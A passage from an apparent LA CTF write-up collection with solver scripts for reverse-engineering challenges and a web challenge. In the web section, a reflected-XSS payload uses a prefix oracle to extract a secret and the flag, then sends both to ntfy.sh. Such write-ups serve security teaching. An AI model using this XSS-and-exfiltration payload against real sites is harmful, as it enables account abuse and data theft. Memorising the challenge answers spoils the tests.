                    cur_stmts.append(Stmt("assign", lhs, parse_expr(rhs)))
                    continue

                if content.startswith("include "):
                    im = re.match(r'include\s+"([^"]+)"\s+(.*)$', content)
                    if not im:
                        raise ValueError(f"bad include: {content}")
                    tname = im.group(1)
                    arg_expr = parse_expr(im.group(2))
                    cur_stmts.append(Stmt("include", tname, arg_expr))
                    continue

                cur_stmts.append(Stmt("expr", parse_expr(content)))

    if cur_name is not None:
        raise ValueError("unterminated define")

    return templates


def link_ifs(stmts):
    stack = []
    for i, st in enumerate(stmts):
        if st.kind == "if":
            stack.append(i)
        elif st.kind == "end":
            if_i = stack.pop()
            stmts[if_i].b = i + 1
    if stack:
        raise ValueError("unclosed if")


@dataclass
class Frame:
    name: str
    dot: dict
    pc: int
    vars: dict


class Engine:
    def __init__(self, templates):
        self.templates = templates
        for _, stmts in templates.items():
            link_ifs(stmts)

    def run_until_clear(self, provisions: str, *, max_steps=800000):
        root = {"sea": {}, "helm": 0, "cargo": "", "provisions": provisions, "logbook": 0}

        stack = [Frame("volumeWorker7940", dot=root, pc=0, vars={})]
        steps = 0
        last2 = 0

        while stack:
            fr = stack[-1]
            prog = self.templates[fr.name]
            if fr.pc >= len(prog):
                stack.pop()
                continue

            st = prog[fr.pc]
            fr.pc += 1
            steps += 1
            if steps > max_steps:
                return None

            if st.kind == "assign":
                fr.vars[st.a] = eval_expr(st.b, fr.vars, fr.dot)
            elif st.kind == "expr":
                _ = eval_expr(st.a, fr.vars, fr.dot)
            elif st.kind == "if":
                if not bool(eval_expr(st.a, fr.vars, fr.dot)):
                    fr.pc = st.b
            elif st.kind == "end":
                pass
            elif st.kind == "include":
                arg = eval_expr(st.b, fr.vars, fr.dot)
                stack.append(Frame(st.a, dot=arg, pc=0, vars={}))
            else:
                raise ValueError(st.kind)

            sea = fr.vars.get("$sea")
            if isinstance(sea, dict):
                cur2 = sea.get("2", 0)
                if last2 == 1 and cur2 == 0:
                    return steps, fr.vars.get("$logbook")
                last2 = cur2

        return None


def main():
    templates = parse_templates(TPL_PATH)
    eng = Engine(templates)

    charset = string.ascii_lowercase + string.digits + "_" + "}" + string.ascii_uppercase
    padding = "A" * 80

    prefix = "lactf{"
    while True:
        best = None
        for ch in charset:
            res = eng.run_until_clear(prefix + ch + padding)
            if res is None:
                continue
            steps, lb = res
            cand = (lb, steps, ch)
            if best is None or cand > best:
                best = cand
        if best is None:
            raise SystemExit("no candidates")
        prefix += best[2]
        print(prefix)
        if best[2] == "}":
            break


if __name__ == "__main__":
    main()
```

### lactf-1986

#### Description

We are given a floppy disk image (`attachments/CHALL.IMG`) containing a DOS executable that checks a flag.

#### Solution

**1) Extract the DOS executable from the FAT12 floppy image**

```bash
mdir -i attachments/CHALL.IMG ::
mcopy -i attachments/CHALL.IMG ::CHALL.EXE extracted/CHALL.EXE
```

**2) Identify the flag-check algorithm**

`CHALL.EXE` is a 16-bit MZ executable. The program’s `main` (in the unpacked load image) does:

1. Reads a line (up to 73 chars), strips the trailing newline.
2. Verifies the input begins with `lactf{`.
3. Computes a 20-bit hash of the full input string:

* State is 20 bits (`0 .. 2^20-1`).
* Update per byte `b`:
  * `state = (state * 67 + b) mod 2^20`

4. Uses that 20-bit state as the seed to generate a keystream using a 20-bit LFSR:

* Let bits be numbered with bit 0 = LSB and bit 19 = MSB.
* Feedback bit:
  * `fb = bit0(state) XOR bit3(state)`
* Update:
  * `state = (state >> 1) | (fb << 19)`

5. For each position `i` (0..72), the program advances the LFSR once, takes the low byte of the new state, XORs it with the input byte, and compares it against a fixed 73-byte table embedded in the program:

```
state = lfsr(state)
expected[i] == (state & 0xff) XOR input[i]
```

Rearrange:

```
input[i] == expected[i] XOR (state & 0xff)
```

So for a *given* seed state, the entire 73-byte plaintext is uniquely determined. The only remaining constraint is self-consistency: the seed must equal the 20-bit hash of the derived plaintext. The state space is only `2^20`, so we can brute-force the seed.
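
The fixed-point structure can be sanity-checked with a round trip on a toy plaintext (the plaintext and table here are illustrative, not the real ones from the EXE):

```python
MASK20 = (1 << 20) - 1

def lfsr_step(state: int) -> int:
    # Same LFSR as the binary: feedback = bit0 XOR bit3, shift right, feedback into bit19.
    fb = (state ^ (state >> 3)) & 1
    return ((state >> 1) | (fb << 19)) & MASK20

def hash20(buf: bytes) -> int:
    # state = (state * 67 + byte) mod 2^20
    s = 0
    for c in buf:
        s = (s * 67 + c) & MASK20
    return s

pt = b"lactf{toy}"          # toy plaintext, not the real flag
seed = hash20(pt)           # the self-consistent seed for this plaintext

# Forward: build the "expected" table the binary would embed for this plaintext.
s, expected = seed, bytearray()
for b in pt:
    s = lfsr_step(s)
    expected.append((s & 0xFF) ^ b)

# Inverse: given the right seed, the plaintext is fully determined byte by byte.
s, recovered = seed, bytearray()
for e in expected:
    s = lfsr_step(s)
    recovered.append((s & 0xFF) ^ e)

assert recovered == pt and hash20(recovered) == seed
```

The brute force is the same inverse direction run for all `2^20` seeds, keeping the one whose derived plaintext hashes back to itself.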

**3) Brute-force the 20-bit seed (single fixed point)**

The ciphertext/expected table is stored in the EXE’s data segment at offset `0x146` and is 0x49 (73) bytes long.

Solver (standalone, includes extraction of the load image and the brute force):

```python
#!/usr/bin/env python3
from __future__ import annotations

from pathlib import Path

MASK20 = (1 << 20) - 1


def lfsr_step(state: int) -> int:
    # 20-bit LFSR, feedback = bit0 XOR bit3, shift right, insert feedback at bit19.
    fb = (state ^ (state >> 3)) & 1
    return ((state >> 1) | (fb << 19)) & MASK20


def hash20(buf: bytes) -> int:
    # Matches the helper at load-image offset 0x10:
    # state = (state * 67 + byte) mod 2^20
    s = 0
    for c in buf:
        s = (s * 67 + c) & MASK20
    return s


def extract_payload(exe_path: Path) -> bytes:
    # MZ header: e_cparhdr at offset 0x08 is header size in paragraphs (16-byte units).
    exe = exe_path.read_bytes()
    if exe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    hdr_paras = int.from_bytes(exe[0x08:0x0A], "little")
    hdr_size = hdr_paras * 16
    return exe[hdr_size:]


def main() -> None:
    payload = extract_payload(Path("extracted/CHALL.EXE"))

    # In the flat payload, the data segment starts at 0x2390 (seg_001).
    # The 73-byte expected table is at DS:0x146 => payload offset 0x2390 + 0x146.
    ds_base = 0x2390
    expected = payload[ds_base + 0x146 : ds_base + 0x146 + 0x49]
    if len(expected) != 0x49:
        raise ValueError("bad expected table length")

    prefix = b"lactf{"

    for seed in range(1 << 20):
        # Early prune: enforce the fixed prefix for the first 6 bytes.
        s = seed
        ok = True
        for i, want in enumerate(prefix):
            s = lfsr_step(s)
            got = (s & 0xFF) ^ expected[i]
            if got != want:
                ok = False
                break
        if not ok:
            continue

        # Derive the full 73-byte candidate flag for this seed.
        s = seed
        cand = bytearray(0x49)
        for i in range(0x49):
            s = lfsr_step(s)
            cand[i] = (s & 0xFF) ^ expected[i]

        # Must not contain NUL/newlines (input is line-based).
        if 0 in cand or 10 in cand or 13 in cand:
            continue

        # Self-consistency: hash(cand) must equal seed.
        if hash20(cand) != seed:
            continue

        print(cand.decode("ascii"))
        return

    raise SystemExit("no solution found")


if __name__ == "__main__":
    main()
```

Running it yields the flag:

```
lactf{3asy_3nough_7o_8rute_f0rce_bu7_n0t_ea5y_en0ugh_jus7_t0_brut3_forc3}
```

### ooo

#### Description

We are given `attachments/ooo.py`, which asks for a guess (flag) and validates it with a loop over adjacent character pairs. The core trick is that the script uses multiple different Unicode characters that look like `o` as distinct function names.

#### Solution

In `attachments/ooo.py`:

* `о(a, b)` returns `a + b`.
* `ὄ(a, b)` returns `a`.
* `ὂ(a, b)` returns `b`.

So the left side of the check is:

```python
о(ὄ(ό,ὃ),ὂ(ό,ὃ)) == ord(guess[i]) + ord(guess[i+1])
```

The right side indexes the list `ὁ` with:

```python
ơ(i, ȯ(օ(ό,ὃ),ό))
```

Using the function definitions:

* `օ(x, y) = x * y`
* `ȯ(x, y) = x % y`
* `ơ(x, y) = x ^ y` (XOR)

So:

```python
ȯ(օ(ό,ὃ),ό) = (ord(guess[i]) * ord(guess[i+1])) % ord(guess[i])
            = 0
```

because `a*b` is always divisible by `a` for nonzero `a` (and `ord(...)` is nonzero for normal characters).

Therefore the index simplifies to:

```python
ơ(i, 0) = i ^ 0 = i
```
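
A quick sanity check of that simplification (the sample characters are arbitrary; the last pair uses Cyrillic/Greek look-alike o's, as in the flag):

```python
# The index expression collapses to i for any pair of nonzero character codes.
for a, b in [("l", "a"), ("c", "t"), ("о", "ο")]:
    x, y = ord(a), ord(b)
    assert (x * y) % x == 0                                # ȯ(օ(ό,ὃ),ό) is always 0
    assert all(i ^ ((x * y) % x) == i for i in range(27))  # so ơ(i, 0) == i
```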

So the loop condition becomes, for `i = 0..25`:

```python
ord(guess[i]) + ord(guess[i+1]) == H[i]
```

where `H` is the list `ὁ`. This gives a recurrence:

```python
c[i+1] = H[i] - c[i]
```

We also know the flag starts with `lactf{`, which determines `c[0] = ord('l')` and uniquely fixes the rest.

Solver (prints a valid flag; the checker only constrains the first 27 characters, so we append `}` to match the usual flag format):

```python
#!/usr/bin/env python3
H = [205, 196, 215, 218, 225, 226, 1189, 2045, 2372, 9300, 8304, 660, 8243, 16057, 16113, 16057, 16004, 16007, 16006, 8561, 805, 346, 195, 201, 154, 146, 223]

cs = [ord("l")]               # flag starts with lactf{
for i in range(len(H) - 1):   # checker iterates range(len(H)-1)
    cs.append(H[i] - cs[-1])

flag = "".join(map(chr, cs)) + "}"
print(flag)
```

Flag:

```
lactf{gоοօỏơóὀόὸὁὃὄὂȯöd_j0b}
```

### starless-c

#### Description

We are given a single weird ELF (`starless_c`) and a remote service (`nc chall.lac.tf 32223`). The program acts like a tiny "maze": it reads single-character moves (`w`, `a`, `s`, `d`) and an action key (`f`).

The goal is to reach the code that prints `flag.txt`.

#### Solution

**1) Identify the flag-print routine**

Disassembling the mapped page at `0x42069000` shows it prints some text, then does:

* `sys_open("flag.txt", 0)`
* `sys_sendfile(1, fd, NULL, 0x100)`
* `sys_exit(0)`

So if we can transfer control to `0x42069000`, we get the flag from the remote filesystem.

**2) Understand the "doors": patching NOP pages**

The interactive loop lives at addresses like `0x6767900c` (each room's page base plus `0xc`). For each move key, the code:

1. Reads the first byte of the *target* page base (e.g. `0x6768a000`).
2. If that byte is `0x90` (NOP), it:
   * Overwrites the target page's first 4 bytes with `31 c0 88 00` (`xor eax,eax; mov [rax],al`) so executing that page base will crash.
   * Stores the original 4 bytes (often `0x90909090`) into some other page base (a 4-byte write).
3. Jumps to the target page's room loop at `target+0xc`.

This effectively lets you "move" a 4-byte NOP sled (`0x90909090`) around between page bases, while consuming the NOP-ness of pages you step into.
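
The per-move state change can be modeled as a tiny pure function (addresses here are illustrative; the solver below tracks the same rule as a bitmask):

```python
def step(nop_pages: set, target: int, dest: int) -> set:
    # If the target page base currently starts with NOPs, moving there consumes
    # its NOP-ness (it gets patched to crashing bytes) and transfers it to dest.
    nop = set(nop_pages)
    if target in nop:
        nop.discard(target)   # target base now starts with 31 c0 88 00
        nop.add(dest)         # dest base receives 0x90909090
    return nop

state = {0x6768A000}                         # illustrative starting NOP page
state = step(state, 0x6768A000, 0x67691000)  # NOP sled moves to dest
assert state == {0x67691000}
state = step(state, 0x67682000, 0x6768C000)  # target not NOP: nothing moves
assert state == {0x67691000}
```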

**3) The win condition is a chain of base jumps to the flag routine**

Some page bases contain `jmp rel32` at offset `+4`. If we replace their first 4 bytes with `0x90909090`, they stop crashing and the jump executes.

There is a direct chain to the flag routine:

* `0x6767a000` (base) `jmp` -> `0x67682000`
* `0x67682000` (base) `jmp` -> `0x6768a000`
* `0x6768a000` (base) `jmp` -> `0x67691000`
* `0x67691000` (base) `jmp` -> `0x67692000`
* `0x67692000` (base) `jmp` -> `0x42069000`

The `f` key jumps to `0x6767a000` (the "final door"). So we need the first 4 bytes of these bases to be NOPs at the moment we press `f`: `0x6767a000`, `0x67682000`, `0x6768a000`, `0x67691000`, `0x67692000`.

**4) Automate the maze with BFS (room + bitmask state)**

We can treat each room base as a node. The only mutable state that matters is which room bases currently start with NOP (`0x90`) versus crash (`0x31`).

So we do a BFS over:

* `room`: current room base address
* `mask`: bitmask of NOP-status for each room base

Transitions are extracted from disassembly: for each room and each move key, record `(target, dest)` where `dest` is where the 4-byte copy goes *if* the target starts with NOP.

When a move goes to a target whose base is currently NOP:

* clear the target's NOP bit (it gets patched to crash)
* set the dest's NOP bit (it receives `0x90909090`)

Once the required five bases are NOP, append `f` and the program jumps through the chain to `0x42069000`.

Below is a complete solver that:

1. Uses `gdb` once to list the mapped RWX room pages.
2. Disassembles each room's handler to extract the `(target, dest)` pairs.
3. Runs BFS to find the shortest winning input string.
4. Optionally connects to the remote service and prints the flag.

```python
#!/usr/bin/env python3
import collections
import re
import socket
import subprocess
import sys

BIN = "attachments/starless_c"
HOST = "chall.lac.tf"
PORT = 32223

KEYS = "wsad"

REQUIRED_CHAIN = {
    0x6767A000,
    0x67682000,
    0x6768A000,
    0x67691000,
    0x67692000,
}


def run_gdb_disasm() -> str:
    # Start at entry (so mappings exist), then:
    # - info proc mappings: find all rwxp pages mapped from our binary
    # - disassemble 160 insns at base+0xc for each room (enough to include all move cases)
    base = [
        "set pagination off",
        f"file {BIN}",
        "starti",
        "info proc mappings",
    ]
    out = subprocess.check_output(
        ["gdb", "-q", "-batch"] + sum([["-ex", x] for x in base], []),
        stderr=subprocess.STDOUT,
        text=True,
    )

    # Parse mappings to find room bases (rwxp pages from our file).
    maps = []
    for line in out.splitlines():
        m = re.match(
            r"\s*(0x[0-9a-f]+)\s+(0x[0-9a-f]+)\s+(0x[0-9a-f]+)\s+(0x[0-9a-f]+)\s+([rwxp-]{4})\s+(.*)",
            line,
        )
        if not m:
            continue
        start = int(m.group(1), 16)
        perms = m.group(5)
        obj = m.group(6)
        if BIN not in obj:
            continue
        if perms != "rwxp":
            continue
        maps.append(start)

    rooms = sorted(set(maps))
    if not rooms:
        raise RuntimeError("no rwxp room mappings found (gdb parse failed?)")

    # Now disassemble all rooms in one gdb run for speed and stable formatting.
    cmds = ["set pagination off", f"file {BIN}", "starti"]
    for r in rooms:
        cmds.append(f"echo \\n== {r:#x} ==\\n")
        cmds.append(f"x/160i {r+0xc:#x}")

    out2 = subprocess.check_output(
        ["gdb", "-q", "-batch"] + sum([["-ex", x] for x in cmds], []),
        stderr=subprocess.STDOUT,
        text=True,
    )
    return out2


def parse_rooms(gdb_text: str):
    # Split sections by markers: "== 0x... =="
    sections = {}
    cur = None
    for line in gdb_text.splitlines():
        m = re.match(r"== (0x[0-9a-f]+) ==", line.strip())
        if m:
            cur = int(m.group(1), 16)
            sections[cur] = []
            continue
        if cur is not None:
            sections[cur].append(line)

    rooms = {}
    for base, lines in sections.items():
        targets = []
        dests = []
        for ln in lines:
            m = re.search(r"mov\s+.*,%eax\s+#\s+(0x[0-9a-f]+)", ln)
            if m:
                targets.append(int(m.group(1), 16))
            m = re.search(r"mov\s+%eax,.*#\s+(0x[0-9a-f]+)", ln)
            if m:
                dests.append(int(m.group(1), 16))

        # The handler has 4 move cases in the order: w, s, a, d
        if len(targets) < 4 or len(dests) < 4:
            continue
        targets = targets[:4]
        dests = dests[:4]

        rooms[base] = {
            "w": (targets[0], dests[0]),
            "s": (targets[1], dests[1]),
            "a": (targets[2], dests[2]),
            "d": (targets[3], dests[3]),
        }

    if not rooms:
        raise RuntimeError("failed to parse any rooms from gdb disassembly")
    return rooms


def initial_nop_mask(pages):
    # Read the first byte of each mapped page from the file and mark NOP-start pages (0x90).
    # We can infer file offsets via a quick gdb info proc mappings parse again, but simplest:
    # just use the known initial NOP pages for this challenge.
    init_nop = {0x67689000, 0x6768A000, 0x6768C000, 0x6768D000, 0x67694000}
    idx = {p: i for i, p in enumerate(pages)}
    mask = 0
    for p in pages:
        if p in init_nop:
            mask |= 1 << idx[p]
    return mask


def bfs_solution(rooms):
    pages = sorted(rooms.keys())
    idx = {p: i for i, p in enumerate(pages)}

    start_room = 0x67679000
    if start_room not in rooms:
        raise RuntimeError("start room not found in parsed rooms")

    mask0 = initial_nop_mask(pages)

    req_mask = 0
    for p in REQUIRED_CHAIN:
        req_mask |= 1 << idx[p]

    def ready(mask):
        return (mask & req_mask) == req_mask

    q = collections.deque([(start_room, mask0)])
    prev = {(start_room, mask0): (None, None)}  # state -> (prev_state, key)

    while q:
        room, mask = q.popleft()
        if ready(mask):
            # reconstruct path
            path = []
            st = (room, mask)
            while prev[st][0] is not None:
                st, k = prev[st]
                path.append(k)
            return "".join(reversed(path)) + "f"

        for k in KEYS:
            t, d = rooms[room][k]
            if t not in idx:
                continue  # unmapped => would SIGSEGV

            newmask = mask
            # If the target page starts with NOP, the program patches it and copies those bytes to dest.
            if (mask >> idx[t]) & 1:
                if d not in idx:
                    continue  # dest unmapped => would SIGSEGV on the store
                newmask &= ~(1 << idx[t])  # target patched to crash
                newmask |= 1 << idx[d]     # dest receives NOPs

            st2 = (t, newmask)
            if st2 in prev:
                continue
            prev[st2] = ((room, mask), k)
            q.append(st2)

    raise RuntimeError("no solution found")


def fetch_remote(seq: str) -> str:
    with socket.create_connection((HOST, PORT), timeout=10) as s:
        s.sendall(seq.encode())
        s.shutdown(socket.SHUT_WR)
        data = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
    return data.decode(errors="replace")


def main():
    gdb_text = run_gdb_disasm()
    rooms = parse_rooms(gdb_text)
    seq = bfs_solution(rooms)
    print(seq)

    if "--remote" in sys.argv:
        print(fetch_remote(seq))


if __name__ == "__main__":
    main()
```

Running the solver produces an input sequence; sending it to the remote service prints the flag: `lactf{starless_c_more_like_starless_0xcc}`.

### the-fish

#### Description

We are given `fish.py`, which implements a 1D esolang interpreter and runs a single-line program (`fisherator`) over the input flag. The program ultimately executes instruction `n`, which pops an integer and checks it against a fixed huge constant; if equal, it prints “Indeed, that is the flag!”.

#### Solution

The input string is first converted to a stack of ASCII codes. The `fisherator` program does two main phases:

1. **Parse flag bytes into an integer `n` (big-endian base-256).**
   * The stack is reversed (`r`) so popping reads the flag left-to-right.
   * A loop performs: `n = n*256 + next_byte`.
2. **Run a Collatz-style process on `n` while building an accumulator `acc`.**
   * Initialize `acc = 1`.
   * Repeat until `n == 1`:
     * `acc = acc*2`
     * If `n` is odd: set `n = (3*n + 1)//2` and `acc = acc + 1`
     * Else: set `n = n//2`
   * Finally, the program checks `acc` against the embedded constant.

So the constant is exactly the final `acc`. Since the loop updates `acc` as `acc = (acc<<1) | (n&1)`, the **binary representation of `acc` encodes the parity bits of `n` along the path to 1** (with a leading `1`).

This is reversible from the end state `n = 1`:

* Extract bits from `acc` least-significant-bit first while `acc > 1` (these correspond to the parities in reverse order).
* Rebuild the previous `n`:
  * If the extracted bit is `0` (even-step), previous `n = 2*current`.
  * If the bit is `1` (odd-step), previous `n = (2*current - 1) / 3` (must divide evenly).

Once the starting `n` is recovered, convert it back to bytes (big-endian) to get the original flag string.

```python
#!/usr/bin/env python3

ACC = 996566347683429688961961964301023586804079510954147876054559647395459973491017596401595804524870382825132807985366740968983080828765835881807124832265927076916036640789039576345929756821059163439816195513160010797349073195590419779437823883987351911858848638715543148499560927646402894094060736432364692585851367946688748713386570173685483800217158511326927462877856683551550570195482724733002494766595319158951960049962201021071499099433062723722295346927562274516673373002429521459396451578444698733546474629616763677756873373867426542764435331574187942918914671163374771769499428478956051633984434410838284545788689925768605629646947266017951214152725326967051673704710610619169658404581055569343649552237459405389619878622595233883088117550243589990766295123312113223283666311520867475139053092710762637855713671921562262375388239616545168599659887895366565464743090393090917526710854631822434014024

def recover_flag_from_acc(acc: int) -> str:
    # Bits appended each iteration are the parity (n&1). Because the program does:
    # acc = acc*2 + (n&1), acc's LSB is the last parity bit.
    bits = []
    while acc > 1:
        bits.append(acc & 1)
        acc >>= 1

    # Reverse the Collatz-style step from terminal n=1 back to the initial n.
    n = 1
    for b in bits:  # already in reverse chronological order
        if b == 0:
            n *= 2
        else:
            t = 2 * n - 1
            if t % 3 != 0:
                raise ValueError("invalid bit sequence: (2*n-1) not divisible by 3")
            n = t // 3

    # Convert big-endian integer back to bytes (original flag chars).
    out = []
    while n > 0:
        out.append(n & 0xFF)
        n >>= 8
    out.reverse()
    return bytes(out).decode("utf-8")

if __name__ == "__main__":
    flag = recover_flag_from_acc(ACC)
    print(flag)
```
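As a sanity check, the forward accumulator process described above can be simulated and inverted on a small round-trip example (a sketch matching the described steps; the test integer here is arbitrary, not the challenge value):

```python
def collatz_acc(n: int) -> int:
    # Forward process from the fisherator program: shift in each parity bit.
    acc = 1
    while n != 1:
        acc = acc * 2 + (n & 1)
        n = (3 * n + 1) // 2 if n & 1 else n // 2
    return acc

def invert_acc(acc: int) -> int:
    # Inverse: peel parity bits LSB-first and undo each step from n = 1.
    n = 1
    while acc > 1:
        n = (2 * n - 1) // 3 if acc & 1 else 2 * n
        acc >>= 1
    return n

n0 = int.from_bytes(b"test", "big")
assert invert_acc(collatz_acc(n0)) == n0
```

The odd-step inversion never fails to divide here, because a forward odd step maps `n` to `(3n+1)/2`, so `2*current - 1` is always exactly `3n`.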

Recovered flag: `lactf{7h3r3_m4y_83_50m3_155u35_w17h_7h15_1f_7h3_c011472_c0nj3c7ur3_15_d15pr0v3n}`

### the-three-sat-problem

#### Description

The provided binary `attachments/three_sat_problem` asks for a solution to a 3-SAT instance. If the input satisfies the embedded constraints, it prints the flag.

#### Solution

1. Static reversing (`objdump -d`) shows:

* The program reads a line into a global buffer at `.bss` address `0x15060`.
* It requires the input length to be exactly `0x4ff` (1279) characters.
* Each character must be `'0'` or `'1'`.
* It calls a large, straight-line checker function at `0x1289` and requires it to return success (`AL==1`).
* It additionally requires input byte `0x2f2` to be `'1'` (the main function does `test byte [0x15352], 1`).
* On success it prints a 40-byte string built by selecting 320 bits from the 1279-bit input using the 320-entry dword table at `.rodata` `0x13080`.

2. Because the checker is straight-line (no conditional branches), we can solve it with symbolic execution:

* Create a blank call-state at `0x1289`.
* Make the 1279 input bytes symbolic, constrain each to `{0x30, 0x31}`.
* Constrain `input[0x2f2] == '1'`.
* Execute to a concrete return address.
* Constrain the return value to `AL==1`.
* Extract a model, then apply the output-bit mapping to recover the printed flag.

Running the script below produces the flag `lactf{is_the_three_body_problem_np_hard}` and also prints the full 1279-character certificate bitstring (second line) which can be fed back into the binary to verify.

```python
#!/usr/bin/env python3
import struct
import angr
import claripy

BIN = './attachments/three_sat_problem'
N = 0x4FF  # 1279
FUNC_OFF = 0x1289
RET_OFF = 0x12982  # one byte past end of .text, safe as concrete return target
INP_OFF = 0x15060
MAP_OFF = 0x13080
MAP_N = 0x140  # 320 bits


def load_map(p: angr.Project) -> list[int]:
    base = p.loader.main_object.mapped_base
    blob = p.loader.memory.load(base + MAP_OFF, 4 * MAP_N)
    return list(struct.unpack('<' + 'I' * MAP_N, blob))


def pack_flag(inp: bytes, mapping: list[int]) -> bytes:
    out = bytearray((MAP_N + 7) // 8)
    for i, idx in enumerate(mapping):
        bit = inp[idx] & 1
        out[i >> 3] |= (bit << (i & 7))
    return bytes(out)


def main():
    p = angr.Project(BIN, auto_load_libs=False)
    base = p.loader.main_object.mapped_base

    func = base + FUNC_OFF
    ret = base + RET_OFF
    inp_addr = base + INP_OFF

    state = p.factory.call_state(func, ret_addr=ret)

    # Symbolic input bytes in .bss where the program stored them.
    inp = [claripy.BVS(f'b{i}', 8) for i in range(N)]
    for i, b in enumerate(inp):
        state.memory.store(inp_addr + i, b)
        state.solver.add(claripy.Or(b == 0x30, b == 0x31))

    # Main also requires this byte's LSB set (i.e. '1')
    state.solver.add(inp[0x2F2] == 0x31)

    simgr = p.factory.simulation_manager(state)
    simgr.explore(find=ret)
    if not simgr.found:
        raise SystemExit('did not reach ret')

    st = simgr.found[0]

    # Checker returns in AL; require success.
    st.solver.add((st.regs.rax & 0xFF) == 1)

    if not st.solver.satisfiable():
        raise SystemExit('unsat')

    concrete = bytes(st.solver.eval(b, cast_to=int) for b in inp)

    mapping = load_map(p)
    flag_bytes = pack_flag(concrete, mapping)

    # The binary uses puts(), so flag should be a C-string. Strip trailing nulls.
    flag = flag_bytes.split(b'\x00', 1)[0]

    print(flag.decode('ascii', 'replace'))

    # Also print the required bitstring (so we can run the binary to cross-check).
    # This is large; keep it last.
    print(concrete.decode('ascii'))


if __name__ == '__main__':
    main()
```

***

## web

### append-note

**Category:** Web | **Points:** 233 | **Solves:** 58

#### Description

Our distributed notes app is append optimized. Reads are eventually consistent with the heat death of the universe! :)

Provided: `app.py` (Flask app), `admin-bot.js` (Puppeteer bot), an instancer giving a challenge URL and an admin-bot URL.

#### Solution

**Source Analysis**

The Flask app generates a random 8-hex-char `SECRET = secrets.token_hex(4)` stored as the first note. Three endpoints matter:

**`/append`** — requires an `admin` cookie. Takes `content` and `url` query params. Validates `url` has scheme `http`/`https` and hostname matching the challenge host. If validation fails, it reflects `parsed_url.hostname` **unescaped** in the error response:

```python
return f"Invalid redirect URL {parsed_url.scheme} {parsed_url.hostname}", 400
```

If validation passes, returns **200** if `content` is a prefix of any note, else **404**, and appends `content` to notes.

**`/flag`** — returns the flag if `?secret=` matches `SECRET`. Has `Access-Control-Allow-Origin: *`.

**Admin bot** — sets an `httpOnly`, `SameSite=Lax` cookie for the challenge domain and navigates to our submitted URL, keeping the page open for 60 seconds.

**Vulnerabilities**

1. **Reflected XSS** in `/append` error page: `parsed_url.hostname` is rendered as raw HTML in a `text/html` response (Flask's default Content-Type for string returns). No CSP is set.
2. **Prefix oracle** in `/append`: the 200 vs 404 status code leaks whether `content` is a prefix of any note (including `SECRET`).

**Exploit Chain**

**Step 1: Reflected XSS via `urlparse` hostname injection**

Python's `urlparse` is permissive — for a URL like `http://<img src=x onerror=PAYLOAD>/path`, it extracts `<img src=x onerror=PAYLOAD>` as the hostname. This hostname fails the challenge-host check, so it gets reflected in the 400 error page as live HTML.

The catch: `urlparse.hostname` **lowercases** everything. JavaScript is case-sensitive, so `encodeURIComponent` becomes `encodeuricomponent` and breaks. The bypass: percent-encode every byte of the JS payload (`(` → `%28`, `A` → `%41`, etc.) and wrap it in `eval(unescape('...'))`. Both `eval` and `unescape` are already lowercase, and `unescape` is case-insensitive for hex digits (`%4E` and `%4e` both decode to `N`).

Using `<img onerror>` instead of `<script>` is critical — an unclosed `<script>` tag (no `</script>` since `/` terminates the hostname in URL parsing) does **not** execute in Chrome, but `<img src=x onerror=...>` fires immediately when the image fails to load.
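The `urlparse` behavior is easy to confirm locally with the standard library:

```python
from urllib.parse import urlparse

# urlparse happily accepts markup as a "hostname" -- and lowercases it,
# which is why the JS payload must survive lowercasing.
u = urlparse("http://<IMG src=x onerror=Alert(1)>/x")
assert u.scheme == "http"
assert u.hostname == "<img src=x onerror=alert(1)>"
```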

The crafted `url` parameter:

```
http://<img src=x onerror=eval(unescape('PERCENT_ENCODED_JS'))>/x
```

The admin bot navigates to:

```
https://CHALLENGE/append?content=&url=<url-encoded evil URL>
```

Since this is a top-level GET navigation, the `SameSite=Lax` admin cookie is sent. Auth passes, URL validation fails (hostname mismatch), and the XSS fires **same-origin** on the challenge domain.

**Step 2: Same-origin prefix oracle brute-force**

Running same-origin, the JS payload uses `fetch()` (cookies auto-included) to query `/append?content=PREFIX&url=CHALLENGE_ORIGIN/` and reads `response.status` directly — **200** means the prefix matches, **404** means it doesn't.

For each of the 8 hex positions, all 16 candidates (`0`–`f`) are tested in parallel via `Promise.all`. This completes in 8 sequential rounds of 16 parallel requests — well within the bot's 60-second window.

Previously appended probe strings never cause false positives: a stored probe from round M is M+1 characters long, so it is strictly shorter than any later round-N probe (N+1 characters, N > M), and a shorter note can never start with a longer probe.
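The oracle loop can be modeled offline (a self-contained sketch; `notes` and `oracle` here stand in for the server state and the `/append` endpoint):

```python
import secrets

SECRET = secrets.token_hex(4)   # stand-in for the server's first note
notes = [SECRET]

def oracle(probe: str) -> bool:
    # Models /append: success iff the probe is a prefix of some note;
    # the probe is then appended as a new note, like the real endpoint.
    ok = any(n.startswith(probe) for n in notes)
    notes.append(probe)
    return ok

recovered = ""
for _ in range(8):
    recovered += next(c for c in "0123456789abcdef" if oracle(recovered + c))
assert recovered == SECRET
```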

**Step 3: Flag retrieval and exfiltration**

Once the SECRET is known, the payload fetches `/flag?secret=SECRET` (which has `ACAO: *`) and exfils both the secret and flag to ntfy.sh via cross-origin `fetch` POST (ntfy.sh returns `Access-Control-Allow-Origin: *`).

**Solve Script**

```python
#!/usr/bin/env python3
"""
Usage: python3 solve_final.py CHALLENGE_URL BOT_URL
Example: python3 solve_final.py https://append-note-xxx.instancer.lac.tf https://admin-bot-xxx.instancer.lac.tf
"""
import sys, time, json, urllib.parse, urllib.request, secrets

def percent_encode_all(s):
    return ''.join(f'%{b:02X}' for b in s.encode())

def make_exploit_url(challenge_url, ntfy_topic):
    JS_PAYLOAD = f'''(async()=>{{
var H=location.origin;
var N="https://ntfy.sh/{ntfy_topic}";
function x(m){{fetch(N,{{method:"POST",body:m}})}}
async function p(pre){{
var r=await fetch(H+"/append?content="+encodeURIComponent(pre)+"&url="+encodeURIComponent(H+"/"));
return r.status===200;
}}
x("started");
if(!(await p(""))){{x("fail-empty");return}}
var sec="";
var hex="0123456789abcdef";
for(var i=0;i<8;i++){{
var res=await Promise.all([...hex].map(async c=>{{var ok=await p(sec+c);return[c,ok]}}));
var hit=res.find(v=>v[1]);
if(!hit){{x("stuck-"+i+"-"+sec);return}}
sec+=hit[0]
}}
x("SECRET="+sec);
try{{var r=await fetch(H+"/flag?secret="+sec);var t=await r.text();x("FLAG="+t)}}catch(e){{x("ERR-"+e)}}
}})()'''

    encoded = percent_encode_all(JS_PAYLOAD)
    evil_url = f"http://<img src=x onerror=eval(unescape('{encoded}'))>/x"
